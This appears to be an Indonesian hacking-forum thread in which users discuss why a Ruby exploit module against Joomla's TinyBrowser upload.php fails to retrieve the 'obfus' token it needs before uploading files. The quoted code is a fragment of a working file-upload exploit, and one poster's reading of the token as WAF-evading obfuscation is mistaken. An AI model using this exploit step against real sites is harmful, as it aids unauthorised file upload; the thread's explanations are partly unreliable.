ASK TENTANG JOOMSCAN.PL
#31
coba pahami dulu dari source code exploitnya, dibagian ini:

Code:
# Get obfuscation code (needed to upload files)
        obfuscation_code = nil
        res = send_request_raw({
            'uri'     => datastore['URI'] + tinybrowserpath + '/upload.php?type=file&folder='
        }, 25)

        if (res)
            
            if(res.body =~ /"obfus", "((\w)+)"\)/)
                obfuscation_code = $1
                print_status("Successfully retrieved obfuscation code: #{obfuscation_code}")
            else
                print_error("Error retrieving obfuscation code!")
                return
            end
        end

klo dilihat yg bagian ini:
Quote: res = send_request_raw({
'uri' => datastore['URI'] + tinybrowserpath + '/upload.php?type=file&folder='

url target disimpen + lokasi tinybrowser + file upload.phpnya = exploit code

nah exploit code ini kemudian diobfuscated biar susah dibaca oleh waf atau filter webnya

tapi ane masih blom ngerti knp kok ga bisa dapet obfucation codenya ya? Angry

mungkin ada yg teman2 lain yg tau?

#32
(03-29-2012, 02:52 AM)konspirasi Wrote: coba pahami dulu dari source code exploitnya, dibagian ini:

Code:
# Get obfuscation code (needed to upload files)
        obfuscation_code = nil
        res = send_request_raw({
            'uri'     => datastore['URI'] + tinybrowserpath + '/upload.php?type=file&folder='
        }, 25)

        if (res)
            
            if(res.body =~ /"obfus", "((\w)+)"\)/)
                obfuscation_code = $1
                print_status("Successfully retrieved obfuscation code: #{obfuscation_code}")
            else
                print_error("Error retrieving obfuscation code!")
                return
            end
        end

klo dilihat yg bagian ini:
Quote: res = send_request_raw({
'uri' => datastore['URI'] + tinybrowserpath + '/upload.php?type=file&folder='

url target disimpen + lokasi tinybrowser + file upload.phpnya = exploit code

nah exploit code ini kemudian diobfuscated biar susah dibaca oleh waf atau filter webnya

tapi ane masih blom ngerti knp kok ga bisa dapet obfucation codenya ya? Angry

mungkin ada yg teman2 lain yg tau?

Kalau menurut saya karena "Restricted access"
kesimpulannya Joomla is NOT vulnerable, exiting.

penjelasan seperti post saya yang di atas..

ada yang punya pendapat lain??





Users browsing this thread: 1 Guest(s)